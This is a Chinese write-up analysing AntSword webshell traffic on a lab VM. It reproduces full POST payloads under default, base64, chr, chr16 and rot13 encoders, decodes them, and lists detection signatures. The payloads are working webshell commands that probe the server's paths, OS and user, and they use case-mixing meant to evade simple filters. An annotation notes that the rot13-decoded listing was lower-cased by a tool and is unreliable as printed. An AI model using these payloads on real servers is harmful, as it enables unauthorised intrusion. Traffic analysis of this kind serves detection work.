蚁剑流量分析

准备

靶机为一台运行 kali 的虚拟机,提前写好了一句话木马(PHP 一句话,连接密码为 `cmd`,即后文报文中承载代码的 POST 参数名)。

流量分析

测试连接

先用 default 编码器(不做任何额外编码,PHP 代码只经过 URL 编码就直接 POST,所以明文可读)

POST /shell0.php HTTP/1.1
Host: 192.168.217.128:100
Accept-Encoding: gzip, deflate
User-Agent: antSword/v2.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 993
Connection: close

cmd=%40ini_set(%22display_errors%22%2C%20%220%22)%3B%40set_time_limit(0)%3Bfunction%20asenc(%24out)%7Breturn%20%24out%3B%7D%3Bfunction%20asoutput()%7B%24output%3Dob_get_contents()%3Bob_end_clean()%3Becho%20%224eba6e362469%22%3Becho%20%40asenc(%24output)%3Becho%20%22b1c628%22%3B%7Dob_start()%3Btry%7B%24D%3Ddirname(%24_SERVER%5B%22SCRIPT_FILENAME%22%5D)%3Bif(%24D%3D%3D%22%22)%24D%3Ddirname(%24_SERVER%5B%22PATH_TRANSLATED%22%5D)%3B%24R%3D%22%7B%24D%7D%09%22%3Bif(substr(%24D%2C0%2C1)!%3D%22%2F%22)%7Bforeach(range(%22C%22%2C%22Z%22)as%20%24L)if(is_dir(%22%7B%24L%7D%3A%22))%24R.%3D%22%7B%24L%7D%3A%22%3B%7Delse%7B%24R.%3D%22%2F%22%3B%7D%24R.%3D%22%09%22%3B%24u%3D(function_exists(%22posix_getegid%22))%3F%40posix_getpwuid(%40posix_geteuid())%3A%22%22%3B%24s%3D(%24u)%3F%24u%5B%22name%22%5D%3A%40get_current_user()%3B%24R.%3Dphp_uname()%3B%24R.%3D%22%09%7B%24s%7D%22%3Becho%20%24R%3B%3B%7Dcatch(Exception%20%24e)%7Becho%20%22ERROR%3A%2F%2F%22.%24e-%3EgetMessage()%3B%7D%3Basoutput()%3Bdie()%3B

可以看到,User-Agent 为 `antSword/v2.1`,一眼就能看出是蚁剑。不过这个 UA 是客户端随手就能改的(见文末"更改UA头"),检测时不能只依赖它;请求体开头固定的 `@ini_set("display_errors", "0");@set_time_limit(0);function asenc(` 前缀以及响应里的随机标记才是更稳定的特征。

url解码

cmd=
# Suppress PHP error output and lift the execution time limit. This two-call
# prefix opens every AntSword PHP payload captured on this page, which makes it
# a far more stable signature than the User-Agent header.
@ini_set("display_errors", "0");
@set_time_limit(0);
# Output "encoder" hook applied to the response body. With the default encoder it
# is the identity function; the base64 sample further down swaps in base64_encode.
function asenc($out){return $out;};
# Release the buffered output to the client wrapped between two random hex markers
# ("4eba6e362469" ... "b1c628" in this request). The markers change on every request;
# presumably the client uses them to cut its own response out of whatever else the
# host page prints. Marker-wrapped bodies are a usable response-side fingerprint.
function asoutput(){
$output=ob_get_contents();# everything buffered since ob_start()
ob_end_clean();# drop the buffer so nothing is emitted twice
echo "4eba6e362469";
echo @asenc($output);# pass through the encoder hook (identity here)
echo "b1c628";
}
ob_start();# start output buffering: everything echoed from here on is captured and only released by asoutput()
try{
$D=dirname($_SERVER["SCRIPT_FILENAME"]); # directory of the webshell itself
if($D=="") $D=dirname($_SERVER["PATH_TRANSLATED"]);# fallback when SCRIPT_FILENAME is empty
# The separator inside the strings below is a TAB (%09 in the raw request above);
# it is rendered as plain whitespace in this listing.
$R="{$D} ";
if(substr($D,0,1)!="/"){# a path not starting with "/" is taken to mean Windows: enumerate drive letters C:..Z:
foreach(range("C","Z")as $L)
if(is_dir("{$L}:"))$R.="{$L}:";
}
else{
$R.="/";
}
$R.=" ";
$u=(function_exists("posix_getegid"))?@posix_getpwuid(@posix_geteuid()):"";
# posix_geteuid(): effective uid of this process; posix_getpwuid(): the user record for that uid
$s=($u)?$u["name"]:@get_current_user();# user name, falling back to @get_current_user() when the POSIX functions are unavailable
$R.=php_uname();
$R.=" {$s}";
echo $R;;# the doubled ";;" recurs in every sample on this page — presumably where the client splices the command template into the wrapper; a cheap fingerprint
}
catch(Exception $e){
echo "ERROR://".$e->getMessage();# errors come back inline with a fixed "ERROR://" prefix
};
asoutput();
die();# stop the host page from rendering anything after the shell output

其中 `cmd` 是一句话木马的连接密码(也就是 POST 参数名),参数值是服务端通过 `eval` 执行的 PHP 代码。

成功返回服务器信息,字段以 TAB 分隔:脚本所在目录、根路径(Windows 上是盘符列表)、`php_uname()`、当前用户。注意实际响应体是 `4eba6e362469` + 下面这一行 + `b1c628`,首尾两个随机 hex 标记来自上面 `asoutput()` 中的两个 `echo`,每次请求都不同,这也是识别蚁剑响应的一个特征。

/var/www/html	/	Linux e8088063b385 5.10.0-kali3-amd64 #1 SMP Debian 5.10.13-1kali1 (2021-02-08) x86_64	www-data

换成base64编码测试,解码器也换成base64,报文如下

POST /shell0.php HTTP/1.1
Host: 192.168.217.128:100
Accept-Encoding: gzip, deflate
User-Agent: antSword/v2.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 970
Connection: close

cmd=%40eval(%40base64_decode(%24_POST%5Bo2bd4cb489ef4a%5D))%3B&o2bd4cb489ef4a=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%2BZ2V0TWVzc2FnZSgpO307YXNvdXRwdXQoKTtkaWUoKTs%3D

url解码,base64解码

cmd=@eval(@base64_decode($_POST[o2bd4cb489ef4a]));
o2bd4cb489ef4a=
# Same fixed prefix as the default-encoder sample: silence errors, no time limit.
@ini_set("display_errors", "0");@set_time_limit(0);

# The only change from the default encoder: the response body is base64-ENCODED
# (not encrypted) before it is echoed between the markers, so a decoder that
# base64-decodes the middle of the response recovers the plaintext.
function asenc($out){
return @base64_encode($out);
};

# Identical to the default-encoder sample apart from the two random response markers
# ("9f4ceef" / "2c9af4ed893"): the asoutput() wrapper, then the same path/drive/uname/user probe.
function asoutput(){$output=ob_get_contents();ob_end_clean();echo "9f4ceef";echo @asenc($output);echo "2c9af4ed893";}ob_start();try{$D=dirname($_SERVER["SCRIPT_FILENAME"]);if($D=="")$D=dirname($_SERVER["PATH_TRANSLATED"]);$R="{$D} ";if(substr($D,0,1)!="/"){foreach(range("C","Z")as $L)if(is_dir("{$L}:"))$R.="{$L}:";}else{$R.="/";}$R.=" ";$u=(function_exists("posix_getegid"))?@posix_getpwuid(@posix_geteuid()):"";$s=($u)?$u["name"]:@get_current_user();$R.=php_uname();$R.=" {$s}";echo $R;;}catch(Exception $e){echo "ERROR://".$e->getMessage();};asoutput();die();

相当于外层 `eval` 先把 POST 参数 `o2bd4cb489ef4a` 做 base64 解码再 `eval`,真正的命令放在这个参数里;解码后的代码和 default 编码几乎没有差别。参数名看起来是随机生成的,但 `@eval(@base64_decode($_POST[` 这个前缀是固定的,可以作为检测特征。

然后测试chr

POST /shell0.php HTTP/1.1
Host: 192.168.217.128:100
Accept-Encoding: gzip, deflate
User-Agent: antSword/v2.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 5473
Connection: close

cmd=%40eVAl(cHr(64).ChR(105).ChR(110).ChR(105).ChR(95).ChR(115).ChR(101).ChR(116).ChR(40).ChR(34).ChR(100).ChR(105).ChR(115).ChR(112).ChR(108).ChR(97).ChR(121).ChR(95).ChR(101).ChR(114).ChR(114).ChR(111).ChR(114).ChR(115).ChR(34).ChR(44).ChR(32).ChR(34).ChR(48).ChR(34).ChR(41).ChR(59).ChR(64).ChR(115).ChR(101).ChR(116).ChR(95).ChR(116).ChR(105).ChR(109).ChR(101).ChR(95).ChR(108).ChR(105).ChR(109).ChR(105).ChR(116).ChR(40).ChR(48).ChR(41).ChR(59).ChR(102).ChR(117).ChR(110).ChR(99).ChR(116).ChR(105).ChR(111).ChR(110).ChR(32).ChR(97).ChR(115).ChR(101).ChR(110).ChR(99).ChR(40).ChR(36).ChR(111).ChR(117).ChR(116).ChR(41).ChR(123).ChR(114).ChR(101).ChR(116).ChR(117).ChR(114).ChR(110).ChR(32).ChR(36).ChR(111).ChR(117).ChR(116).ChR(59).ChR(125).ChR(59).ChR(102).ChR(117).ChR(110).ChR(99).ChR(116).ChR(105).ChR(111).ChR(110).ChR(32).ChR(97).ChR(115).ChR(111).ChR(117).ChR(116).ChR(112).ChR(117).ChR(116).ChR(40).ChR(41).ChR(123).ChR(36).ChR(111).ChR(117).ChR(116).ChR(112).ChR(117).ChR(116).ChR(61).ChR(111).ChR(98).ChR(95).ChR(103).ChR(101).ChR(116).ChR(95).ChR(99).ChR(111).ChR(110).ChR(116).ChR(101).ChR(110).ChR(116).ChR(115).ChR(40).ChR(41).ChR(59).ChR(111).ChR(98).ChR(95).ChR(101).ChR(110).ChR(100).ChR(95).ChR(99).ChR(108).ChR(101).ChR(97).ChR(110).ChR(40).ChR(41).ChR(59).ChR(101).ChR(99).ChR(104).ChR(111).ChR(32).ChR(34).ChR(49).ChR(55).ChR(99).ChR(54).ChR(56).ChR(54).ChR(48).ChR(100).ChR(56).ChR(55).ChR(34).ChR(59).ChR(101).ChR(99).ChR(104).ChR(111).ChR(32).ChR(64).ChR(97).ChR(115).ChR(101).ChR(110).ChR(99).ChR(40).ChR(36).ChR(111).ChR(117).ChR(116).ChR(112).ChR(117).ChR(116).ChR(41).ChR(59).ChR(101).ChR(99).ChR(104).ChR(111).ChR(32).ChR(34).ChR(101).ChR(51).ChR(57).ChR(57).ChR(99).ChR(34).ChR(59).ChR(125).ChR(111).ChR(98).ChR(95).ChR(115).ChR(116).ChR(97).ChR(114).ChR(116).ChR(40).ChR(41).ChR(59).ChR(116).ChR(114).ChR(121).ChR(123).ChR(36).ChR(68).ChR(61).ChR(100).ChR(105).ChR(114).ChR(110).ChR(97).ChR(109).ChR(101).ChR(40).ChR(36).ChR(95).ChR(83).ChR(69).ChR(82).ChR(86).ChR
(69).ChR(82).ChR(91).ChR(34).ChR(83).ChR(67).ChR(82).ChR(73).ChR(80).ChR(84).ChR(95).ChR(70).ChR(73).ChR(76).ChR(69).ChR(78).ChR(65).ChR(77).ChR(69).ChR(34).ChR(93).ChR(41).ChR(59).ChR(105).ChR(102).ChR(40).ChR(36).ChR(68).ChR(61).ChR(61).ChR(34).ChR(34).ChR(41).ChR(36).ChR(68).ChR(61).ChR(100).ChR(105).ChR(114).ChR(110).ChR(97).ChR(109).ChR(101).ChR(40).ChR(36).ChR(95).ChR(83).ChR(69).ChR(82).ChR(86).ChR(69).ChR(82).ChR(91).ChR(34).ChR(80).ChR(65).ChR(84).ChR(72).ChR(95).ChR(84).ChR(82).ChR(65).ChR(78).ChR(83).ChR(76).ChR(65).ChR(84).ChR(69).ChR(68).ChR(34).ChR(93).ChR(41).ChR(59).ChR(36).ChR(82).ChR(61).ChR(34).ChR(123).ChR(36).ChR(68).ChR(125).ChR(9).ChR(34).ChR(59).ChR(105).ChR(102).ChR(40).ChR(115).ChR(117).ChR(98).ChR(115).ChR(116).ChR(114).ChR(40).ChR(36).ChR(68).ChR(44).ChR(48).ChR(44).ChR(49).ChR(41).ChR(33).ChR(61).ChR(34).ChR(47).ChR(34).ChR(41).ChR(123).ChR(102).ChR(111).ChR(114).ChR(101).ChR(97).ChR(99).ChR(104).ChR(40).ChR(114).ChR(97).ChR(110).ChR(103).ChR(101).ChR(40).ChR(34).ChR(67).ChR(34).ChR(44).ChR(34).ChR(90).ChR(34).ChR(41).ChR(97).ChR(115).ChR(32).ChR(36).ChR(76).ChR(41).ChR(105).ChR(102).ChR(40).ChR(105).ChR(115).ChR(95).ChR(100).ChR(105).ChR(114).ChR(40).ChR(34).ChR(123).ChR(36).ChR(76).ChR(125).ChR(58).ChR(34).ChR(41).ChR(41).ChR(36).ChR(82).ChR(46).ChR(61).ChR(34).ChR(123).ChR(36).ChR(76).ChR(125).ChR(58).ChR(34).ChR(59).ChR(125).ChR(101).ChR(108).ChR(115).ChR(101).ChR(123).ChR(36).ChR(82).ChR(46).ChR(61).ChR(34).ChR(47).ChR(34).ChR(59).ChR(125).ChR(36).ChR(82).ChR(46).ChR(61).ChR(34).ChR(9).ChR(34).ChR(59).ChR(36).ChR(117).ChR(61).ChR(40).ChR(102).ChR(117).ChR(110).ChR(99).ChR(116).ChR(105).ChR(111).ChR(110).ChR(95).ChR(101).ChR(120).ChR(105).ChR(115).ChR(116).ChR(115).ChR(40).ChR(34).ChR(112).ChR(111).ChR(115).ChR(105).ChR(120).ChR(95).ChR(103).ChR(101).ChR(116).ChR(101).ChR(103).ChR(105).ChR(100).ChR(34).ChR(41).ChR(41).ChR(63).ChR(64).ChR(112).ChR(111).ChR(115).ChR(105).ChR(120).ChR(95).ChR(103).ChR(101).ChR(116).ChR(112).ChR(119).ChR
(117).ChR(105).ChR(100).ChR(40).ChR(64).ChR(112).ChR(111).ChR(115).ChR(105).ChR(120).ChR(95).ChR(103).ChR(101).ChR(116).ChR(101).ChR(117).ChR(105).ChR(100).ChR(40).ChR(41).ChR(41).ChR(58).ChR(34).ChR(34).ChR(59).ChR(36).ChR(115).ChR(61).ChR(40).ChR(36).ChR(117).ChR(41).ChR(63).ChR(36).ChR(117).ChR(91).ChR(34).ChR(110).ChR(97).ChR(109).ChR(101).ChR(34).ChR(93).ChR(58).ChR(64).ChR(103).ChR(101).ChR(116).ChR(95).ChR(99).ChR(117).ChR(114).ChR(114).ChR(101).ChR(110).ChR(116).ChR(95).ChR(117).ChR(115).ChR(101).ChR(114).ChR(40).ChR(41).ChR(59).ChR(36).ChR(82).ChR(46).ChR(61).ChR(112).ChR(104).ChR(112).ChR(95).ChR(117).ChR(110).ChR(97).ChR(109).ChR(101).ChR(40).ChR(41).ChR(59).ChR(36).ChR(82).ChR(46).ChR(61).ChR(34).ChR(9).ChR(123).ChR(36).ChR(115).ChR(125).ChR(34).ChR(59).ChR(101).ChR(99).ChR(104).ChR(111).ChR(32).ChR(36).ChR(82).ChR(59).ChR(59).ChR(125).ChR(99).ChR(97).ChR(116).ChR(99).ChR(104).ChR(40).ChR(69).ChR(120).ChR(99).ChR(101).ChR(112).ChR(116).ChR(105).ChR(111).ChR(110).ChR(32).ChR(36).ChR(101).ChR(41).ChR(123).ChR(101).ChR(99).ChR(104).ChR(111).ChR(32).ChR(34).ChR(69).ChR(82).ChR(82).ChR(79).ChR(82).ChR(58).ChR(47).ChR(47).ChR(34).ChR(46).ChR(36).ChR(101).ChR(45).ChR(62).ChR(103).ChR(101).ChR(116).ChR(77).ChR(101).ChR(115).ChR(115).ChR(97).ChR(103).ChR(101).ChR(40).ChR(41).ChR(59).ChR(125).ChR(59).ChR(97).ChR(115).ChR(111).ChR(117).ChR(116).ChR(112).ChR(117).ChR(116).ChR(40).ChR(41).ChR(59).ChR(100).ChR(105).ChR(101).ChR(40).ChR(41).ChR(59))%3B

可以看到命令是通过 `chr()` 逐字符拼接成字符串再 `eval` 的(`eVAl`、`cHr`、`ChR` 大小写混写,应该是为了绕过大小写敏感的简单匹配)。chr16 编码与此类似,只是把十进制参数换成了十六进制(`0x40` 等),并不是"16 位",报文如下

POST /shell0.php HTTP/1.1
Host: 192.168.217.128:100
Accept-Encoding: gzip, deflate
User-Agent: antSword/v2.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 6462
Connection: close

cmd=%40eVAl(cHr(0x40).ChR(0x69).ChR(0x6e).ChR(0x69).ChR(0x5f).ChR(0x73).ChR(0x65).ChR(0x74).ChR(0x28).ChR(0x22).ChR(0x64).ChR(0x69).ChR(0x73).ChR(0x70).ChR(0x6c).ChR(0x61).ChR(0x79).ChR(0x5f).ChR(0x65).ChR(0x72).ChR(0x72).ChR(0x6f).ChR(0x72).ChR(0x73).ChR(0x22).ChR(0x2c).ChR(0x20).ChR(0x22).ChR(0x30).ChR(0x22).ChR(0x29).ChR(0x3b).ChR(0x40).ChR(0x73).ChR(0x65).ChR(0x74).ChR(0x5f).ChR(0x74).ChR(0x69).ChR(0x6d).ChR(0x65).ChR(0x5f).ChR(0x6c).ChR(0x69).ChR(0x6d).ChR(0x69).ChR(0x74).ChR(0x28).ChR(0x30).ChR(0x29).ChR(0x3b).ChR(0x66).ChR(0x75).ChR(0x6e).ChR(0x63).ChR(0x74).ChR(0x69).ChR(0x6f).ChR(0x6e).ChR(0x20).ChR(0x61).ChR(0x73).ChR(0x65).ChR(0x6e).ChR(0x63).ChR(0x28).ChR(0x24).ChR(0x6f).ChR(0x75).ChR(0x74).ChR(0x29).ChR(0x7b).ChR(0x72).ChR(0x65).ChR(0x74).ChR(0x75).ChR(0x72).ChR(0x6e).ChR(0x20).ChR(0x24).ChR(0x6f).ChR(0x75).ChR(0x74).ChR(0x3b).ChR(0x7d).ChR(0x3b).ChR(0x66).ChR(0x75).ChR(0x6e).ChR(0x63).ChR(0x74).ChR(0x69).ChR(0x6f).ChR(0x6e).ChR(0x20).ChR(0x61).ChR(0x73).ChR(0x6f).ChR(0x75).ChR(0x74).ChR(0x70).ChR(0x75).ChR(0x74).ChR(0x28).ChR(0x29).ChR(0x7b).ChR(0x24).ChR(0x6f).ChR(0x75).ChR(0x74).ChR(0x70).ChR(0x75).ChR(0x74).ChR(0x3d).ChR(0x6f).ChR(0x62).ChR(0x5f).ChR(0x67).ChR(0x65).ChR(0x74).ChR(0x5f).ChR(0x63).ChR(0x6f).ChR(0x6e).ChR(0x74).ChR(0x65).ChR(0x6e).ChR(0x74).ChR(0x73).ChR(0x28).ChR(0x29).ChR(0x3b).ChR(0x6f).ChR(0x62).ChR(0x5f).ChR(0x65).ChR(0x6e).ChR(0x64).ChR(0x5f).ChR(0x63).ChR(0x6c).ChR(0x65).ChR(0x61).ChR(0x6e).ChR(0x28).ChR(0x29).ChR(0x3b).ChR(0x65).ChR(0x63).ChR(0x68).ChR(0x6f).ChR(0x20).ChR(0x22).ChR(0x33).ChR(0x65).ChR(0x32).ChR(0x35).ChR(0x62).ChR(0x36).ChR(0x63).ChR(0x22).ChR(0x3b).ChR(0x65).ChR(0x63).ChR(0x68).ChR(0x6f).ChR(0x20).ChR(0x40).ChR(0x61).ChR(0x73).ChR(0x65).ChR(0x6e).ChR(0x63).ChR(0x28).ChR(0x24).ChR(0x6f).ChR(0x75).ChR(0x74).ChR(0x70).ChR(0x75).ChR(0x74).ChR(0x29).ChR(0x3b).ChR(0x65).ChR(0x63).ChR(0x68).ChR(0x6f).ChR(0x20).ChR(0x22).ChR(0x61).ChR(0x37).ChR(0x35).ChR(0x61).ChR(0x38).ChR(0x38).ChR(0x61).ChR(0x22).ChR(0x3b).ChR(0x7d
).ChR(0x6f).ChR(0x62).ChR(0x5f).ChR(0x73).ChR(0x74).ChR(0x61).ChR(0x72).ChR(0x74).ChR(0x28).ChR(0x29).ChR(0x3b).ChR(0x74).ChR(0x72).ChR(0x79).ChR(0x7b).ChR(0x24).ChR(0x44).ChR(0x3d).ChR(0x64).ChR(0x69).ChR(0x72).ChR(0x6e).ChR(0x61).ChR(0x6d).ChR(0x65).ChR(0x28).ChR(0x24).ChR(0x5f).ChR(0x53).ChR(0x45).ChR(0x52).ChR(0x56).ChR(0x45).ChR(0x52).ChR(0x5b).ChR(0x22).ChR(0x53).ChR(0x43).ChR(0x52).ChR(0x49).ChR(0x50).ChR(0x54).ChR(0x5f).ChR(0x46).ChR(0x49).ChR(0x4c).ChR(0x45).ChR(0x4e).ChR(0x41).ChR(0x4d).ChR(0x45).ChR(0x22).ChR(0x5d).ChR(0x29).ChR(0x3b).ChR(0x69).ChR(0x66).ChR(0x28).ChR(0x24).ChR(0x44).ChR(0x3d).ChR(0x3d).ChR(0x22).ChR(0x22).ChR(0x29).ChR(0x24).ChR(0x44).ChR(0x3d).ChR(0x64).ChR(0x69).ChR(0x72).ChR(0x6e).ChR(0x61).ChR(0x6d).ChR(0x65).ChR(0x28).ChR(0x24).ChR(0x5f).ChR(0x53).ChR(0x45).ChR(0x52).ChR(0x56).ChR(0x45).ChR(0x52).ChR(0x5b).ChR(0x22).ChR(0x50).ChR(0x41).ChR(0x54).ChR(0x48).ChR(0x5f).ChR(0x54).ChR(0x52).ChR(0x41).ChR(0x4e).ChR(0x53).ChR(0x4c).ChR(0x41).ChR(0x54).ChR(0x45).ChR(0x44).ChR(0x22).ChR(0x5d).ChR(0x29).ChR(0x3b).ChR(0x24).ChR(0x52).ChR(0x3d).ChR(0x22).ChR(0x7b).ChR(0x24).ChR(0x44).ChR(0x7d).ChR(0x9).ChR(0x22).ChR(0x3b).ChR(0x69).ChR(0x66).ChR(0x28).ChR(0x73).ChR(0x75).ChR(0x62).ChR(0x73).ChR(0x74).ChR(0x72).ChR(0x28).ChR(0x24).ChR(0x44).ChR(0x2c).ChR(0x30).ChR(0x2c).ChR(0x31).ChR(0x29).ChR(0x21).ChR(0x3d).ChR(0x22).ChR(0x2f).ChR(0x22).ChR(0x29).ChR(0x7b).ChR(0x66).ChR(0x6f).ChR(0x72).ChR(0x65).ChR(0x61).ChR(0x63).ChR(0x68).ChR(0x28).ChR(0x72).ChR(0x61).ChR(0x6e).ChR(0x67).ChR(0x65).ChR(0x28).ChR(0x22).ChR(0x43).ChR(0x22).ChR(0x2c).ChR(0x22).ChR(0x5a).ChR(0x22).ChR(0x29).ChR(0x61).ChR(0x73).ChR(0x20).ChR(0x24).ChR(0x4c).ChR(0x29).ChR(0x69).ChR(0x66).ChR(0x28).ChR(0x69).ChR(0x73).ChR(0x5f).ChR(0x64).ChR(0x69).ChR(0x72).ChR(0x28).ChR(0x22).ChR(0x7b).ChR(0x24).ChR(0x4c).ChR(0x7d).ChR(0x3a).ChR(0x22).ChR(0x29).ChR(0x29).ChR(0x24).ChR(0x52).ChR(0x2e).ChR(0x3d).ChR(0x22).ChR(0x7b).ChR(0x24).ChR(0x4c).ChR(0x7d).ChR(0x3a).ChR(0x22).ChR(0x3b).ChR(0x7d)
.ChR(0x65).ChR(0x6c).ChR(0x73).ChR(0x65).ChR(0x7b).ChR(0x24).ChR(0x52).ChR(0x2e).ChR(0x3d).ChR(0x22).ChR(0x2f).ChR(0x22).ChR(0x3b).ChR(0x7d).ChR(0x24).ChR(0x52).ChR(0x2e).ChR(0x3d).ChR(0x22).ChR(0x9).ChR(0x22).ChR(0x3b).ChR(0x24).ChR(0x75).ChR(0x3d).ChR(0x28).ChR(0x66).ChR(0x75).ChR(0x6e).ChR(0x63).ChR(0x74).ChR(0x69).ChR(0x6f).ChR(0x6e).ChR(0x5f).ChR(0x65).ChR(0x78).ChR(0x69).ChR(0x73).ChR(0x74).ChR(0x73).ChR(0x28).ChR(0x22).ChR(0x70).ChR(0x6f).ChR(0x73).ChR(0x69).ChR(0x78).ChR(0x5f).ChR(0x67).ChR(0x65).ChR(0x74).ChR(0x65).ChR(0x67).ChR(0x69).ChR(0x64).ChR(0x22).ChR(0x29).ChR(0x29).ChR(0x3f).ChR(0x40).ChR(0x70).ChR(0x6f).ChR(0x73).ChR(0x69).ChR(0x78).ChR(0x5f).ChR(0x67).ChR(0x65).ChR(0x74).ChR(0x70).ChR(0x77).ChR(0x75).ChR(0x69).ChR(0x64).ChR(0x28).ChR(0x40).ChR(0x70).ChR(0x6f).ChR(0x73).ChR(0x69).ChR(0x78).ChR(0x5f).ChR(0x67).ChR(0x65).ChR(0x74).ChR(0x65).ChR(0x75).ChR(0x69).ChR(0x64).ChR(0x28).ChR(0x29).ChR(0x29).ChR(0x3a).ChR(0x22).ChR(0x22).ChR(0x3b).ChR(0x24).ChR(0x73).ChR(0x3d).ChR(0x28).ChR(0x24).ChR(0x75).ChR(0x29).ChR(0x3f).ChR(0x24).ChR(0x75).ChR(0x5b).ChR(0x22).ChR(0x6e).ChR(0x61).ChR(0x6d).ChR(0x65).ChR(0x22).ChR(0x5d).ChR(0x3a).ChR(0x40).ChR(0x67).ChR(0x65).ChR(0x74).ChR(0x5f).ChR(0x63).ChR(0x75).ChR(0x72).ChR(0x72).ChR(0x65).ChR(0x6e).ChR(0x74).ChR(0x5f).ChR(0x75).ChR(0x73).ChR(0x65).ChR(0x72).ChR(0x28).ChR(0x29).ChR(0x3b).ChR(0x24).ChR(0x52).ChR(0x2e).ChR(0x3d).ChR(0x70).ChR(0x68).ChR(0x70).ChR(0x5f).ChR(0x75).ChR(0x6e).ChR(0x61).ChR(0x6d).ChR(0x65).ChR(0x28).ChR(0x29).ChR(0x3b).ChR(0x24).ChR(0x52).ChR(0x2e).ChR(0x3d).ChR(0x22).ChR(0x9).ChR(0x7b).ChR(0x24).ChR(0x73).ChR(0x7d).ChR(0x22).ChR(0x3b).ChR(0x65).ChR(0x63).ChR(0x68).ChR(0x6f).ChR(0x20).ChR(0x24).ChR(0x52).ChR(0x3b).ChR(0x3b).ChR(0x7d).ChR(0x63).ChR(0x61).ChR(0x74).ChR(0x63).ChR(0x68).ChR(0x28).ChR(0x45).ChR(0x78).ChR(0x63).ChR(0x65).ChR(0x70).ChR(0x74).ChR(0x69).ChR(0x6f).ChR(0x6e).ChR(0x20).ChR(0x24).ChR(0x65).ChR(0x29).ChR(0x7b).ChR(0x65).ChR(0x63).ChR(0x68).ChR(0x6f).ChR(0x20).ChR(0x22).C
hR(0x45).ChR(0x52).ChR(0x52).ChR(0x4f).ChR(0x52).ChR(0x3a).ChR(0x2f).ChR(0x2f).ChR(0x22).ChR(0x2e).ChR(0x24).ChR(0x65).ChR(0x2d).ChR(0x3e).ChR(0x67).ChR(0x65).ChR(0x74).ChR(0x4d).ChR(0x65).ChR(0x73).ChR(0x73).ChR(0x61).ChR(0x67).ChR(0x65).ChR(0x28).ChR(0x29).ChR(0x3b).ChR(0x7d).ChR(0x3b).ChR(0x61).ChR(0x73).ChR(0x6f).ChR(0x75).ChR(0x74).ChR(0x70).ChR(0x75).ChR(0x74).ChR(0x28).ChR(0x29).ChR(0x3b).ChR(0x64).ChR(0x69).ChR(0x65).ChR(0x28).ChR(0x29).ChR(0x3b))%3B

测试rot13

POST /shell0.php HTTP/1.1
Host: 192.168.217.128:100
Accept-Encoding: gzip, deflate
User-Agent: antSword/v2.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 1064
Connection: close

cmd=%40eval(%40str_rot13(%24_POST%5Bm3fad46e15e6b5%5D))%3B&m3fad46e15e6b5=%40vav_frg(%22qvfcynl_reebef%22%2C%20%220%22)%3B%40frg_gvzr_yvzvg(0)%3Bshapgvba%20nfrap(%24bhg)%7Berghea%20%24bhg%3B%7D%3Bshapgvba%20nfbhgchg()%7B%24bhgchg%3Dbo_trg_pbagragf()%3Bbo_raq_pyrna()%3Brpub%20%223on4r1q%22%3Brpub%20%40nfrap(%24bhgchg)%3Brpub%20%22sps90147n686%22%3B%7Dbo_fgneg()%3Bgel%7B%24Q%3Dqveanzr(%24_FREIRE%5B%22FPEVCG_SVYRANZR%22%5D)%3Bvs(%24Q%3D%3D%22%22)%24Q%3Dqveanzr(%24_FREIRE%5B%22CNGU_GENAFYNGRQ%22%5D)%3B%24E%3D%22%7B%24Q%7D%09%22%3Bvs(fhofge(%24Q%2C0%2C1)!%3D%22%2F%22)%7Bsbernpu(enatr(%22P%22%2C%22M%22)nf%20%24Y)vs(vf_qve(%22%7B%24Y%7D%3A%22))%24E.%3D%22%7B%24Y%7D%3A%22%3B%7Dryfr%7B%24E.%3D%22%2F%22%3B%7D%24E.%3D%22%09%22%3B%24h%3D(shapgvba_rkvfgf(%22cbfvk_trgrtvq%22))%3F%40cbfvk_trgcjhvq(%40cbfvk_trgrhvq())%3A%22%22%3B%24f%3D(%24h)%3F%24h%5B%22anzr%22%5D%3A%40trg_pheerag_hfre()%3B%24E.%3Dcuc_hanzr()%3B%24E.%3D%22%09%7B%24f%7D%22%3Brpub%20%24E%3B%3B%7Dpngpu(Rkprcgvba%20%24r)%7Brpub%20%22REEBE%3A%2F%2F%22.%24r-%3EtrgZrffntr()%3B%7D%3Bnfbhgchg()%3Bqvr()%3B

url解码

cmd=@eval(@str_rot13($_POST[m3fad46e15e6b5]));
m3fad46e15e6b5=@vav_frg("qvfcynl_reebef", "0");@frg_gvzr_yvzvg(0);shapgvba nfrap($bhg){erghea $bhg;};shapgvba nfbhgchg(){$bhgchg=bo_trg_pbagragf();bo_raq_pyrna();rpub "3on4r1q";rpub @nfrap($bhgchg);rpub "sps90147n686";}bo_fgneg();gel{$Q=qveanzr($_FREIRE["FPEVCG_SVYRANZR"]);vs($Q=="")$Q=qveanzr($_FREIRE["CNGU_GENAFYNGRQ"]);$E="{$Q} ";vs(fhofge($Q,0,1)!="/"){sbernpu(enatr("P","M")nf $Y)vs(vf_qve("{$Y}:"))$E.="{$Y}:";}ryfr{$E.="/";}$E.=" ";$h=(shapgvba_rkvfgf("cbfvk_trgrtvq"))?@cbfvk_trgcjhvq(@cbfvk_trgrhvq()):"";$f=($h)?$h["anzr"]:@trg_pheerag_hfre();$E.=cuc_hanzr();$E.=" {$f}";rpub $E;;}pngpu(Rkprcgvba $r){rpub "REEBE://".$r->trgZrffntr();};nfbhgchg();qvr();

rot13解码

# NOTE(review): this decoded text was lower-cased by the tool that produced it, not by the
# payload. str_rot13 preserves case, and the raw parameter above still reads
# $_FREIRE["FPEVCG_SVYRANZR"] / Rkprcgvba / trgZrffntr, i.e. $_SERVER["SCRIPT_FILENAME"] /
# Exception / getMessage. As printed here ($_server, exception) the code would not even run;
# the real payload is the same as the default-encoder sample, markers "3ba4e1d" / "fcf90147a686".
@ini_set("display_errors", "0");@set_time_limit(0);function asenc($out){return $out;};function asoutput(){$output=ob_get_contents();ob_end_clean();echo "3ba4e1d";echo @asenc($output);echo "fcf90147a686";}ob_start();try{$d=dirname($_server["script_filename"]);if($d=="")$d=dirname($_server["path_translated"]);$r="{$d}	";if(substr($d,0,1)!="/"){foreach(range("c","z")as $l)if(is_dir("{$l}:"))$r.="{$l}:";}else{$r.="/";}$r.="	";$u=(function_exists("posix_getegid"))?@posix_getpwuid(@posix_geteuid()):"";$s=($u)?$u["name"]:@get_current_user();$r.=php_uname();$r.="	{$s}";echo $r;;}catch(exception $e){echo "error://".$e->getmessage();};asoutput();die();

